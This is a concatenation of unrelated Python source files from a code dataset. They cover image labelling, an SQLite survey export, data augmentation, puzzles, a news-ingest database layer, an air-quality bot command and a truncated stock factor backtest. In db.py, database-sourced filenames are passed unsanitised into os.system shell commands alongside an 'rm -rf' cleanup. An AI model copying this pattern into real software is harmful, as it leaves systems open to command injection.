'marks': [\n# {'image': '/home/popugayman/Desktop/nn_smehnov/easynn_marker/images/How-to-Train-Your-Dog-to-Force-Fetch.jpg',\n# 'label': 'asd', 'corners': [[0.1675, 0.30451127819548873], [0.8825, 0.5488721804511278]]},\n# {'image': '/home/popugayman/Desktop/nn_smehnov/easynn_marker/images/dog-zoomies.jpg', 'label': 'asd',\n# 'corners': [[0.355, 0.07518796992481203], [0.8525, 0.6842105263157895]]},\n# {'image': '/home/popugayman/Desktop/nn_smehnov/easynn_marker/images/dog-zoomies.jpg', 'label': 'asd',\n# 'corners': [[0.4625, 0.2631578947368421], [0.7475, 0.6992481203007519]]},\n# {'image': '/home/popugayman/Desktop/nn_smehnov/easynn_marker/images/honey_575p.jpg', 'label': 'asd',\n# 'corners': [[0.065, 0.18352059925093633], [0.875, 0.9700374531835206]]},\n# {'image': '/home/popugayman/Desktop/nn_smehnov/easynn_marker/images/cat.jpeg', 'label': 'asd',\n# 'corners': [[0.26755852842809363, 0.13], [0.8494983277591973, 0.52]]},\n# {'image': '/home/popugayman/Desktop/nn_smehnov/easynn_marker/images/cat.jpeg', 'label': 'asd',\n# 'corners': [[0.3311036789297659, 0.2925], [0.5852842809364549, 0.5625]]},\n# {'image': '/home/popugayman/Desktop/nn_smehnov/easynn_marker/images/cat.jpeg', 'label': 'asd',\n# 'corners': [[0.17391304347826086, 0.2925], [0.5652173913043478, 0.4925]]},\n# {'image': '/home/popugayman/Desktop/nn_smehnov/easynn_marker/images/cat.jpeg', 'label': 'asd',\n# 'corners': [[0.4816053511705686, 0.5225], [0.7892976588628763, 0.6475]]},\n# {'image': '/home/popugayman/Desktop/nn_smehnov/easynn_marker/images/honey_575p.jpg', 'label': 'asd',\n# 'corners': [[0.63, 0.7228464419475655], [0.87, 0.8689138576779026]]}]}\n","sub_path":"src/TrainStarter.py","file_name":"TrainStarter.py","file_ext":"py","file_size_in_byte":4689,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"42942040","text":"import sqlite3\nimport os\n\nabs_path = os.getcwd()\n\n\nclass DB_Connector():\n def __init__(self):\n self.con = sqlite3.connect(os.path.join(abs_path, 'db', 'mds_env.db'))\n self.curse = self.con.cursor()\n\n def init_envsurvey(self):\n self.curse.execute(\"\"\"\n create table if not exists mds_env_survey (\n ID INTEGER PRIMARY KEY AUTOINCREMENT,\n name CHAR(50),\n date date,\n companyname CHAR(50),\n username CHAR(50),\n userphone CHAR(50),\n userepl CHAR(50),\n companylocation CHAR(50),\n latlng CHAR(50),\n huanping CHAR(50),\n reportbook CHAR(50),\n reporttable CHAR(50),\n dengjitable CHAR(50),\n xianchangxiangfu CHAR(50),\n xianchangxiangfu_desc TEXT,\n yanshou CHAR(50),\n yanshou_desc TEXT,\n shengchangongyi TEXT,\n yuanliang TEXT,\n chengping TEXT,\n weixianping CHAR(50),\n wuranqingkuang CHAR(50),\n huanjingjijinyuyan CHAR(50),\n qingjiebianhao CHAR(50),\n wushuiqingkuang CHAR(50),\n dunwei FLOAT(50),\n wushuichuligongyi CHAR(50),\n feiqiqingkuang CHAR(50),\n fengliang FLOAT(50),\n feiqichuligongyi CHAR(50),\n wuni FLOAT(50),\n youqi FLOAT(50),\n jinshu FLOAT(50),\n fenchen FLOAT(50),\n feiqiwutianxiemingcheng FLOAT(50),\n qitashuoming TEXT,\n zaoyinqingkuang CHAR(50),\n pianjian FLOAT(50),\n PAC FLOAT(50),\n PAM FLOAT(50),\n tansuangai FLOAT(50),\n chulinji FLOAT(50),\n nalixianggaizao CHAR(50),\n zhushi TEXT,\n pic TEXT\n )\n \"\"\")\n\n def drop(self):\n self.curse.execute(\"drop table if exists mds_env_survey\")\n\n def close(self):\n self.curse.close()\n self.con.close()\n\n\n\ndef download_all():\n db = DB_Connector()\n db.curse.execute(\"select * from mds_env_survey\")\n data = db.curse.fetchall()\n dt = [i[1:-1] for i in data]\n pics = 
{i[-1]: i[3] for i in data if i[-1] and i[3]}\n all_cols_table = \"\"\"业务人员,日期,企业名称,业主姓名,业主电话,业主职务,企业地址,经纬度,环评情况,报告书,报告表,登记表,现场相符,不否说明,验收情况,为什么没验收,生产工艺,原辅料,成品,危险品,重点污染,环境应急预案,清洁生产,污水,吨位,污水处理,废气,风量,废气处理,污泥,油漆,金属,粉尘,废弃物,其他物质说明,噪音,片碱,PAC,PAM,碳酸钙,除磷剂,哪里需要改造,注\"\"\"\n cols = all_cols_table.split(',')\n dt = [cols] + dt\n import xlwt, os, zipfile\n wbk = xlwt.Workbook()\n sheet = wbk.add_sheet('Sheet1', cell_overwrite_ok=True)\n for i in range(len(dt)):\n for j in range(len(dt[i])):\n sheet.write(i, j, dt[i][j])\n wbk.save('static/download_all/all.xls')\n for k, v in pics.items():\n if not os.path.exists(os.path.join(os.getcwd(), 'static', 'download_all', v)):\n os.mkdir(os.path.join(os.getcwd(), 'static', 'download_all', v))\n for pic in k.split(','):\n os.system(\"cp db/pics/%s static/download_all/%s/%s\" % (pic, v, pic))\n startdir = os.path.join(os.getcwd(), 'static', 'download_all')\n file_news = os.path.join(os.getcwd(), 'static', 'download_all') + '.zip'\n z = zipfile.ZipFile(file_news, 'w', zipfile.ZIP_DEFLATED)\n for dirpath, dirnames, filenames in os.walk(startdir):\n fpath = dirpath.replace(startdir, '')\n fpath = fpath and fpath + os.sep or ''\n for filename in filenames:\n z.write(os.path.join(dirpath, filename), fpath + filename)\n print('压缩成功')\n z.close()\n os.system(\"rm -rf static/download_all/*\")\n\ndef read_word(f_name):\n import docx\n doc_file = docx.Document(f_name)\n for i in range(len(doc_file.paragraphs)):\n print(\"第\" + str(i) + \"段的内容是:\" + doc_file.paragraphs[i].text)\n\nif __name__ == '__main__':\n read_word(\"requirment.docx\")\n # db = DB_Connector()\n # db.curse.execute(\"select name,date from mds_env_survey where name in ('老王')\")\n # print(db.curse.fetchall())\n # db.drop()\n # db.init_envsurvey()\n","sub_path":"db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":4174,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"303921767","text":"import cv2\nfrom random import random, randint\nimport numpy as np\n\n\ndef random_crop_square(image, bboxes):\n oh, ow = image.shape[:2]\n if len(bboxes) > 0:\n minx = np.min(bboxes[:, 0])\n miny = np.min(bboxes[:, 1])\n else:\n minx = ow\n miny = oh\n\n if oh > ow:\n dw = 0\n span = oh - ow\n span = min(span, miny)\n dh = randint(0, span)\n min_size = ow\n else:\n span = ow - oh\n span = min(span, minx)\n dw = randint(0, span)\n dh = 0\n min_size = oh\n return image[dh: dh + min_size, dw: dw + min_size], (dh, dw, min_size)\n\n\ndef center_is_in_img(bboxes, size):\n center = (bboxes[:, 2:] + bboxes[:, :2]) / 2\n mask = (center[:, 0] < 0) + (center[:, 1] < 0) + (center[:, 0] > size) + (center[:, 1] > size)\n return mask\n\n\ndef abandon_min_face(bboxes, min_area):\n mask = np.prod(bboxes[:, 2:] - bboxes[:, :2], -1) > min_area\n return mask\n\n\nclass CropResize:\n def __init__(self, size, crop_prob=0.5):\n self.size = size\n self.crop_prob = crop_prob\n\n def __call__(self, data):\n image = data[\"image\"]\n bboxes, conf = data[\"bboxes\"][:, :4], data[\"bboxes\"][:, 4:]\n np.random.uniform()\n oh, ow = image.shape[:2]\n hw_ratio = oh / ow\n # cv2.imshow(\"o\", image)\n if 0.8 < hw_ratio < 1.25 and random() > self.crop_prob:\n hr, wr = self.size / oh, self.size / ow\n bboxes[:, ::2] = bboxes[:, ::2] * wr\n bboxes[:, 1::2] = bboxes[:, 1::2] * hr\n image = cv2.resize(image, (self.size, self.size))\n bboxes = bboxes / 4\n else:\n image, (dh, dw, length) = random_crop_square(image, bboxes)\n bboxes[:, ::2] = bboxes[:, ::2] - dw\n bboxes[:, 1::2] = bboxes[:, 1::2] - 
dh\n mask = (bboxes[:, 0] > length) + (bboxes[:, 2] < 0) + \\\n (bboxes[:, 1] > length) + (bboxes[:, 3] < 0)\n # mask = center_is_in_img(bboxes, length)\n mask = ~mask\n bboxes = bboxes[mask]\n bboxes = np.clip(bboxes, 0, length)\n conf = conf[mask]\n image = cv2.resize(image, (self.size, self.size))\n ratio = self.size / length\n bboxes = bboxes * ratio / 4\n ground_truth = np.concatenate([bboxes, conf], -1)\n mask = abandon_min_face(bboxes, 25)\n\n # tmp_image = image[..., (2, 1, 0)].copy()\n # tmp_image = np.ascontiguousarray(tmp_image)\n # for box in (bboxes[mask] * 4).astype(int):\n # cv2.rectangle(tmp_image, (box[0], box[1]), (box[2], box[3]), (0, 255, 0), 1)\n # cv2.imshow(\"r\", tmp_image)\n # print(bboxes, mask, tmp_image.shape)\n # cv2.waitKey()\n\n\n data[\"image\"] = image\n data[\"bboxes\"] = ground_truth[mask]\n return data\n\n\nclass Normalization:\n def __init__(self, mean, var):\n self.mean = mean\n self.var = var\n\n def __call__(self, data):\n image = data[\"image\"]\n image = image.astype(\"float32\")\n image = image / 255.\n image[:, :] -= self.mean\n image[:, :] /= self.var\n image = image.transpose((2, 0, 1))\n data[\"image\"] = image\n return data\n","sub_path":"utils/augmentations.py","file_name":"augmentations.py","file_ext":"py","file_size_in_byte":3231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"339600417","text":"import pprint\n\npicnicItems = {'apples': 5, 'cups': 2}\nprint('I am bringing ' + str(picnicItems.get('cups', 0)) + ' cups.')\n\nspam = {'name': 'Pooka', 'age': 5}\nspam.setdefault('color', 'black')\nprint (spam)\n\nmessage = 'It was a bright cold day in April, and the clocks were striking thirteen.'\ncount = {}\ncontador = 0\nfor character in message:\n contador = contador + 1\n count.setdefault(character, 0)\n count[character] = count[character] + 1\nprint(count)\npprint.pprint(count)\nprint('NUMBER OF CHARACTER: ' + str(contador))\n","sub_path":"get-setdefault.py","file_name":"get-setdefault.py","file_ext":"py","file_size_in_byte":531,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"191088014","text":"class Particle:\n def __init__(self, num, p, v, a):\n self.num = num\n self.p = p\n self.v = v\n self.a = a\n\n def getDistance(self):\n return abs(self.p[0]) + abs(self.p[1]) + abs(self.p[2])\n\n def move(self):\n for i in range(3):\n self.v[i] += self.a[i]\n self.p[i] += self.v[i]\n\ndef p2(file):\n particles = []\n for lineNum in range(len(file)):\n line = file[lineNum]\n line = line.strip().split(\", \")\n p = [int(i) for i in line[0][3:-1].split(\",\")]\n v = [int(i) for i in line[1][3:-1].split(\",\")]\n a = [int(i) for i in line[2][3:-1].split(\",\")]\n particles.append(Particle(lineNum, p, v, a))\n for i in range(100):\n [i.move() for i in particles]\n toRemove = []\n for i in particles:\n for j in particles:\n if j != i:\n if i.p == j.p:\n if i not in toRemove:\n toRemove.append(i)\n if j not in toRemove:\n toRemove.append(j)\n for i in toRemove:\n particles.remove(i)\n return len(particles)\n\ndef p1(file):\n particles = []\n for lineNum in range(len(file)):\n line = file[lineNum]\n line = line.strip().split(\", \")\n p = [int(i) for i in line[0][3:-1].split(\",\")]\n v = [int(i) for i in line[1][3:-1].split(\",\")]\n a = [int(i) for i in line[2][3:-1].split(\",\")]\n particles.append(Particle(lineNum, p, v, a))\n for i in range(1000):\n [i.move() for i in particles]\n minDistance = min([i.getDistance() for i in particles])\n 
minID = [i.num for i in particles if i.getDistance() == minDistance]\n return minID\n\n\nfile = list(open(\"f.txt\", \"r\"))\nprint(p2(file))","sub_path":"advent2017/a20.py","file_name":"a20.py","file_ext":"py","file_size_in_byte":1801,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"416944857","text":"\n\"\"\"\nWORD SNAKE CHALLENGE:\n\n Link to Challenge: http://redd.it/3bi5na\n\n Author: Kyle Bendickson, https://github.com/kbendick/\n\n My current solution is a quick prototype. To avoid the case where the\n word snake would collide with itself, the direction of the next word\n is alternated between right and down.\n\nSample Input: \"SHENANIGANS SALTY YOUNGSTER ROUND DOUBLET TERABYTE ESSENCE\"\nSample Output:\n\nSHENANIGANS\n A\n L\n T\n YOUNGSTER\n O\n U\n N\n DOUBLET\n E\n R\n A\n B\n Y\n T\n ESSENCE\n\nAs this was built was a quick prototype to an online practice problem,\nplease note that this is by no means representative of a good final solution.\nThere documented cases where the solution will fail (as well as possibly\nundocumented solutions as well). Additionally, I am likely to leave code\nin that I do not use on the off chance that it proves useful later.\n\nIf for some reason you have landed upon this repository to implement a solution\nfor your own use, feel free. I highly suggest that you don't, but what you do\nwith your work is your business.\n\"\"\"\n\n# Directions\nLEFT, RIGHT, UP, DOWN = (0, -1), (0, 1), (1, 0), (-1, 0)\nDIRECTIONS = {LEFT, RIGHT, UP, DOWN}\n\nclass WordSnakeError(Exception): pass\n\nclass WordSnake:\n\n def __init__(self, direction=RIGHT, x_offset=0, y_offset=0, words=None, x_coord=0, y_coord=0,):\n self.direction = direction\n #self.x_coord = x_coord # x_coord of current snake head\n #self.y_coord = y_coord # y_coord of current snake head\n self.x_print_offset = x_offset\n self.y_print_offset = y_offset\n self.words = (self._get_words() if not words else words.strip().upper().split())\n\n def change_direction(self):\n \"\"\" Changes the snake's direction alternating between right and down.\n \"\"\"\n self._flip_right() if self.direction == DOWN else self._flip_down()\n\n def _flip_right(self):\n self.direction = RIGHT\n\n def _flip_left(self):\n self.direction = LEFT\n\n def _flip_up(self):\n self.direction = UP\n\n def _flip_down(self):\n self.direction = DOWN\n\n def _get_words(self):\n \"\"\" Prompts the user for words to be used. 
Words must be separated by white space.\n \"\"\"\n return input(\"Enter words to snake: \").strip().upper().split()\n\n #### TO DO: CURRENTLY ONLY HANDLES RIGHT AND DOWN MOVEMENTS\n def format_next(self, word):\n formatted_word = ''\n\n # Truncate the last letter of all words except the last\n if word != self.words[-1]:\n word = word[:-1]\n\n # Format the word to be printed in the direction the snake is traveling\n if self.direction == RIGHT:\n formatted_word = word\n elif self.direction == DOWN:\n for char in word:\n formatted_word += char + '\\n' + ' ' * self.x_print_offset\n else:\n raise WordSnakeError(\"WordSnake.format_next - format_next is only implemented for RIGHT and DOWN.\")\n\n # Update the print offset\n self._update_print_offset_by(word)\n\n return formatted_word\n\n def _update_print_offset_by(self, previous_word):\n \"\"\" Takes in the last word printed to the word snake (with terminal\n characters removed when indicated) and updates the print offsets.\n \"\"\"\n if self.direction == RIGHT:\n self.x_print_offset += len(previous_word)\n elif self.direction == DOWN:\n self.y_print_offset += len(previous_word)\n\n def run(self):\n \"\"\" Prints the word snake to the console.\n \"\"\"\n for word in self.words:\n print(self.format_next(word), end='')\n self.change_direction()\n print()\n\n# Build/run the test suite if module is __main__\nif __name__ == '__main__':\n\n SAMPLE_INPUT_ONE = \"SHENANIGANS SALTY YOUNGSTER ROUND DOUBLET TERABYTE ESSENCE\"\n SAMPLE_INPUT_TWO = \"DELOREAN NEUTER RAMSHACKLE EAR RUMP PALINDROME EXEMPLARY YARD\"\n CHALLENGE_INPUT_ONE = \"CAN NINCOMPOOP PANTS SCRIMSHAW WASTELAND DIRK KOMBAT TEMP PLUNGE ESTER REGRET TOMBOY\"\n CHALLENGE_INPUT_TWO = \"NICKEL LEDERHOSEN NARCOTRAFFICANTE EAT TO OATS SOUP PAST TELEMARKETER RUST THINGAMAJIG GROSS SALTPETER REISSUE ELEPHANTITIS\"\n\n TEST_SUITE = [SAMPLE_INPUT_ONE, SAMPLE_INPUT_TWO, CHALLENGE_INPUT_ONE, CHALLENGE_INPUT_TWO]\n\n\n for test_words in TEST_SUITE:\n WordSnake(words=test_words).run()\n\n\n\n","sub_path":"[2015-06-29] Challenge #221 [Easy] Word snake/word_snake.py","file_name":"word_snake.py","file_ext":"py","file_size_in_byte":4640,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"527237539","text":"import os\nfrom datetime import datetime\nimport json\n\nimport asyncpg\n\n\nclass DatabaseConnection(object):\n def __init__(self):\n self.connection_url = os.environ.get(\"AS_POSTGRES_DSN\")\n self.pool = None\n\n async def init_models(self):\n self.pool = await asyncpg.create_pool(dsn=self.connection_url)\n async with self.pool.acquire() as c, c.transaction():\n await c.execute(\n \"\"\"\n CREATE TABLE IF NOT EXISTS news_v2 (\n serverid varchar(8),\n news_id int,\n thumbnail varchar(16),\n title text,\n ts timestamp,\n internal_category int,\n body_html text,\n body_dm text,\n card_refs text,\n visible bool,\n PRIMARY KEY (serverid, news_id)\n );\n\n CREATE TABLE IF NOT EXISTS dt_v1 (\n serverid varchar(8),\n dt_id int,\n ts timestamp,\n next_ts timestamp,\n title text,\n body_html text,\n body_dm text,\n PRIMARY KEY (serverid, dt_id)\n );\n\n CREATE TABLE IF NOT EXISTS dt_char_refs_v1 (\n serverid varchar(8),\n dt_id int,\n char_id int,\n UNIQUE (serverid, dt_id, char_id),\n FOREIGN KEY (serverid, dt_id) REFERENCES dt_v1 (serverid, dt_id)\n ON UPDATE CASCADE ON DELETE CASCADE\n );\n \"\"\"\n )\n\n async def get_epoch(self, server_id):\n async with self.pool.acquire() as c:\n t = await c.fetchrow(\n \"SELECT ts FROM news_v2 WHERE serverid = $1 ORDER BY 
ts DESC LIMIT 1\", server_id\n )\n if not t:\n return datetime.utcfromtimestamp(0)\n return t[0]\n\n async def insert_notice(\n self, server_id, nid, title, ts, cat, thumb, body_dm, body_html, card_refs\n ):\n async with self.pool.acquire() as c, c.transaction():\n await c.execute(\n \"INSERT INTO news_v2 VALUES ($1, $2, $3, $4, $5, $6, $7, $8, $9, FALSE) ON CONFLICT DO NOTHING\",\n server_id,\n nid,\n thumb,\n title,\n ts,\n cat,\n body_html,\n body_dm,\n json.dumps(card_refs) if card_refs else None,\n )\n\n async def all_posts(self):\n async with self.pool.acquire() as c, c.transaction():\n return await c.fetch(\"SELECT serverid, news_id, body_dm FROM news_v2\")\n\n async def update_post(self, server_id, nid, body_html, card_refs):\n async with self.pool.acquire() as c, c.transaction():\n await c.execute(\n \"UPDATE news_v2 SET body_html=$1, card_refs=$2 WHERE serverid=$3 AND news_id=$4\",\n body_html,\n json.dumps(card_refs) if card_refs else None,\n server_id,\n nid,\n )\n\n async def update_visibility(self, vis_list):\n async with self.pool.acquire() as c, c.transaction():\n await c.execute(\n \"CREATE TEMPORARY TABLE vis(notice_id int, visible bool) ON COMMIT DROP\"\n )\n await c.copy_records_to_table(\"vis\", records=[(id, True) for id in vis_list])\n await c.execute(\"UPDATE news_v2 SET visible = FALSE\")\n await c.execute(\n \"UPDATE news_v2 SET visible = vis.visible FROM vis WHERE vis.notice_id = news_v2.news_id\"\n )\n\n async def all_dt(self):\n async with self.pool.acquire() as c, c.transaction():\n return await c.fetch(\"SELECT serverid, dt_id, body_dm FROM dt_v1\")\n\n async def get_dt_epoch(self, server_id):\n async with self.pool.acquire() as c:\n t = await c.fetchrow(\n \"SELECT next_ts FROM dt_v1 WHERE serverid = $1 ORDER BY next_ts DESC LIMIT 1\",\n server_id,\n )\n if not t:\n return datetime.utcfromtimestamp(0)\n return t[0]\n\n async def add_dt(self, server_id, dtid, ts, next_ts, title, body_dm, body_html, char_refs):\n async with self.pool.acquire() as c, c.transaction():\n await c.execute(\n \"INSERT INTO dt_v1 VALUES ($1, $2, $3, $4, $5, $6, $7) ON CONFLICT DO NOTHING\",\n server_id,\n dtid,\n ts,\n next_ts,\n title,\n body_html,\n body_dm,\n )\n await c.executemany(\n \"INSERT INTO dt_char_refs_v1 VALUES ($1, $2, $3) ON CONFLICT DO NOTHING\",\n ((server_id, dtid, x) for x in char_refs),\n )\n\n async def update_dt(self, server_id, dt_id, body, char_refs):\n async with self.pool.acquire() as c, c.transaction():\n await c.execute(\n \"UPDATE dt_v1 SET body_html=$1 WHERE serverid=$2 AND dt_id=$3\",\n body,\n server_id,\n dt_id,\n )\n await c.execute(\n \"DELETE FROM dt_char_refs_v1 WHERE serverid=$1 AND dt_id=$2\", server_id, dt_id\n )\n await c.executemany(\n \"INSERT INTO dt_char_refs_v1 VALUES ($1, $2, $3) ON CONFLICT DO NOTHING\",\n ((server_id, dt_id, x) for x in char_refs),\n )\n","sub_path":"maintenance/news/ingest.py","file_name":"ingest.py","file_ext":"py","file_size_in_byte":5618,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"637622255","text":"import json\nimport urllib.request\ntry:\n import botmodules.userlocation as user\nexcept ImportError:\n user = None\npass\n\n\ndef get_aqi(self, e):\n if user and not e.input:\n try:\n location = user.get_location_extended(self, e.nick)\n loc = \"geo:{};{}\".format(location.lat, location.lng)\n except Exception as ex:\n self.logger.exception(\"location aqi exception{}\".format(ex))\n e.output = \"No user location found\"\n return e\n elif e.input[-1] == 
\"!\":\n # force location by name\n loc = e.input[:-1]\n elif e.input:\n _, lat, lng, _ = user.google_geocode(self, e.input)\n loc = \"geo:{};{}\".format(lat, lng)\n\n url = \"http://api.waqi.info/feed/{}/?token={}\"\n url = url.format(loc, self.botconfig[\"APIkeys\"][\"aqicn\"])\n\n data = urllib.request.urlopen(url).read().decode()\n data = json.loads(data)\n if data['status'] != \"ok\":\n self.logger.debug(\"AQI Lookup failed:\")\n self.logger.debug(data)\n return\n data = data['data']\n \n pm25 = data['iaqi']['pm25']['v']\n\n if pm25 < 50:\n condition = \" (Good)\"\n elif pm25 < 101:\n condition = \" (Moderate)\"\n elif pm25 < 151:\n condition = \" (Unhealthy for sensitive groups)\"\n elif pm25 < 201:\n condition = \" (Unhealthy)\"\n elif pm25 < 301:\n condition = \" (Very Unhealthy)\"\n elif pm25 > 300:\n condition = \" (Hazardous)\"\n else:\n condition = \"\"\n\n city = data['city']['name']\n out = \"{} - Air Quality: PM2.5: {}{}\".format(city, pm25, condition)\n\n try:\n o3 = pm25 = data['iaqi']['o3']['v']\n out += \" Ozone: {}\".format(o3)\n except:\n pass\n\n\n e.output = out\n\n return e\n\nget_aqi.command = \"!aqi\"\n\n","sub_path":"botmodules/aqi.py","file_name":"aqi.py","file_ext":"py","file_size_in_byte":1764,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"588995849","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Feb 11 16:42:31 2020\n\n@author: downey\n\"\"\"\n\nimport os\nimport datetime\nimport time\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy import stats\nfrom pandas_datareader.famafrench import get_available_datasets\nimport pandas_datareader.data as web\n\n\n#use the performance_analysis python file to import functions\nos.chdir('PERFORMANCE_ANALYSIS LOCATION HERE')\n\nfrom performance_analysis import annualized_return\nfrom performance_analysis import annualized_standard_deviation\nfrom performance_analysis import max_drawdown\nfrom performance_analysis import gain_to_pain_ratio\nfrom performance_analysis import calmar_ratio\nfrom performance_analysis import sharpe_ratio\nfrom performance_analysis import sortino_ratio\n\npd.set_option('display.max_columns', 200)\npd.set_option('display.max_rows', 1000)\nplt.style.use('ggplot')\n#turn off pandas warning for index/slicing as copy warning\npd.options.mode.chained_assignment = None # default='warn'\n#%%\n#######################Fundamental and Equity Prices##########################\n\n#fundamental data\nfundamental_data = (\n pd.read_csv('file here')\n )\n\n#import all of the equity price data from csv from Sharadar\nequity_prices = (\n pd.read_csv('file here')\n )\n\n#get ticker meta data\ntickers_df = (\n pd.read_csv('filer here', low_memory=False)\n )\n\n#filter out companies not based in USA\ntickers_df1 = tickers_df[tickers_df['location'].notnull()]\ntickers_df1 = tickers_df1[tickers_df1['location'].str.contains(\"U.S.\")]\n\n#select needed columns to filter out sector in fundamental\ntickers_df1 = (\n tickers_df1[['ticker', 'sector', 'name',\n 'industry', 'scalemarketcap']]\n )\n\n#create set and list of all tickers\nmyset_ticker = set(tickers_df1.ticker)\nlist_tickers = list(myset_ticker)\n\n#filtered USA fundamental data\nUSA_fundamentals = fundamental_data[fundamental_data['ticker'].isin(list_tickers)]\n#%%\n\n################# Filtering the Dataset #####################\n\n\n#test_sector = 'Technology' #\n\n#### The 11 Sectors you can choose from ####\n\n#'Healthcare', 'Basic 
Materials', 'Financial Services',\n#'Technology', 'Industrials', 'Consumer Cyclical', 'Real Estate',\n#'Consumer Defensive', 'Communication Services', 'Energy',\n#'Utilities'\n\n#If you want to just test the sector\n#sector_stocks = tickers_df1[tickers_df1['sector'] == test_sector]\n\n#OR\n\n#If you wanted to remove Real estate and Financial Services\n#sector_stocks = tickers_df1[tickers_df1['sector'] != 'Real Estate']\n#sector_stocks = sector_stocks[sector_stocks['sector'] != 'Financial Services']\n \n#OR\n \n#To test all the market\nsector_stocks = tickers_df1\n\n#put tickers to list from sector specified\nsector_tickers = sector_stocks['ticker'].tolist()\n\n#fundamentals imported already\nfundamentals = USA_fundamentals[USA_fundamentals.ticker.isin(sector_tickers)]\n\n#Choose dimension rolling 'twelve month as reported' 'ART'. Sharadar has revisions\n#and that would be lookahead bias to use that data.\nfundamentals = fundamentals[fundamentals.dimension == 'ART']\n\n#Find data rows where fundamentals have been restated for previous quarter\n#and we want to remove for backtesting since at the time you only have the first\n#release of data and not subsequent revisions\nduplicateRowsDF = fundamentals[fundamentals.duplicated(['ticker', 'calendardate'])]\n\nprint(\"Duplicate Rows based on 2 columns are:\", duplicateRowsDF, sep='\\n')\n\nfundamentals = fundamentals.drop_duplicates(subset = ['ticker', 'calendardate'],\\\n keep = 'first')\n\nduplicateRowsDF = fundamentals[fundamentals.duplicated(['ticker', 'calendardate'])]\n\n#make sure there are no duplicates\nprint(\"Duplicate Rows based on 2 columns are:\", duplicateRowsDF, sep='\\n')\n\n#filter out companies with less than $1 billion market cap or another market cap\n#that suits your fancy\nData_for_Portfolio = fundamentals[fundamentals['marketcap'] >= 1e9]\n\n#put tickers in a list\ntickers = Data_for_Portfolio['ticker'].tolist()\nprint('There are ' + str(len(set(tickers))) + ' tickers') #number of unique tickers\n#%%\n#### Map Sector info onto the Fundamental DataFrame to use later ###\n\n#create the dictionary with values and keys as dates\nkeys = tickers_df1['ticker']\nvalues = tickers_df1['sector']\nDictionary_Sector_values = dict(zip(keys, values))\n\nData_for_Portfolio['sector'] = Data_for_Portfolio\\\n ['ticker'].map(Dictionary_Sector_values)\n#%%\n################# Creating Factor Inputs #####################\n\n### Value Factor ###\nData_for_Portfolio['E/P'] = Data_for_Portfolio['netinc'] / \\\n Data_for_Portfolio['marketcap']\nData_for_Portfolio['EBITDA/EV'] = Data_for_Portfolio['ebitda'] / \\\n Data_for_Portfolio['ev']\nData_for_Portfolio['FCF/P'] = Data_for_Portfolio['fcf'] / \\\n Data_for_Portfolio['marketcap']\n\n### Shareholder Yield ###\nData_for_Portfolio['Shareholder Yield'] = \\\n -((Data_for_Portfolio['ncfdebt'] + \\\n Data_for_Portfolio['ncfdiv'] + \\\n Data_for_Portfolio['ncfcommon']) / Data_for_Portfolio['marketcap'])\n \n###### Quality Factor - ideas taken from Alpha Architect QV model #######\n\n####Long Term Business Strength\n \n#Can you generate free cash flow\nData_for_Portfolio['FCF/Assets'] = Data_for_Portfolio['fcf'] / \\\n Data_for_Portfolio['assets']\n\n#Can you generate returns on investment \nData_for_Portfolio['ROA'] = Data_for_Portfolio['roa'] \nData_for_Portfolio['ROIC'] = Data_for_Portfolio['roic']\n\n#Do you have a defendable business model?\nData_for_Portfolio['GROSS MARGIN'] = Data_for_Portfolio['grossmargin']\n\n#Current Financial Strength\n\nData_for_Portfolio['CURRENT RATIO'] = 
Data_for_Portfolio['currentratio']\nData_for_Portfolio['INTEREST/EBITDA'] = Data_for_Portfolio['intexp'] / \\\n Data_for_Portfolio['ebitda'] \n#%%\n###################################################################\n\nt0 = time.time()\n\n#sort out Sector Prices\nSector_stock_prices = equity_prices.loc \\\n [equity_prices['ticker'].isin(tickers)]\n\nData_for_Portfolio = Data_for_Portfolio.dropna()\n\n#Using the same in sample dates here and for equal weight benchmark\n \nf_date = datetime.date(2012, 9, 30) \nl_date = datetime.date(2020, 9, 30) #choosing the last date, results in last\n#date for returns is l_date + 1 quarter\n\ndelta = l_date - f_date\nquarters_delta = np.floor(delta.days/(365/4))\nquarters_delta = int(quarters_delta)\nfirst_quarter = str('2012-09-30') #using f_date\nData_for_Portfolio_master = pd.DataFrame(Data_for_Portfolio)\n\n#choose if you want percentiles or fixed number of companies in long portfolio\nPercentile_split = .1\n#OR\nCompanies_in_Portfolio = 5\nWinsorize_Threshold = .025 #used to determine the winsorize level. If you are\n#only going to have a handful of companies than put the threshold really low, \n#otherwise you can use around .025 for a decile portfolio\n\nPortfolio_Turnover = pd.DataFrame()\nportfolio_returns = pd.DataFrame()\n\n#extracting and sorting the price index from the stock price df for use\n#in the for loop \nprice_index = Sector_stock_prices.set_index('date')\nprice_index = price_index.index\nprice_index = price_index.unique()\nprice_index = pd.to_datetime(price_index)\nprice_index = price_index.sort_values()\n\nfor i in range(0, quarters_delta, 4):\n\n #filter the data for only current date to look at\n Date = pd.to_datetime(first_quarter) + pd.tseries.offsets.QuarterEnd(i)\n Date = Date.strftime('%Y-%m-%d')\n Data_for_Portfolio_master_filter = Data_for_Portfolio_master.loc\\\n [Data_for_Portfolio_master['calendardate'] == Date]\n \n ###### VALUE FACTOR ######\n \n #Winsorize the metric data and compress outliers if desired\n Data_for_Portfolio_master_filter['E/P Winsorized'] = \\\n stats.mstats.winsorize(Data_for_Portfolio_master_filter['E/P'], \\\n limits=Winsorize_Threshold)\n Data_for_Portfolio_master_filter['EBITDA/EV Winsorized'] = \\\n stats.mstats.winsorize(Data_for_Portfolio_master_filter['EBITDA/EV'], \\\n limits=Winsorize_Threshold)\n Data_for_Portfolio_master_filter['FCF/P Winsorized'] = \\\n 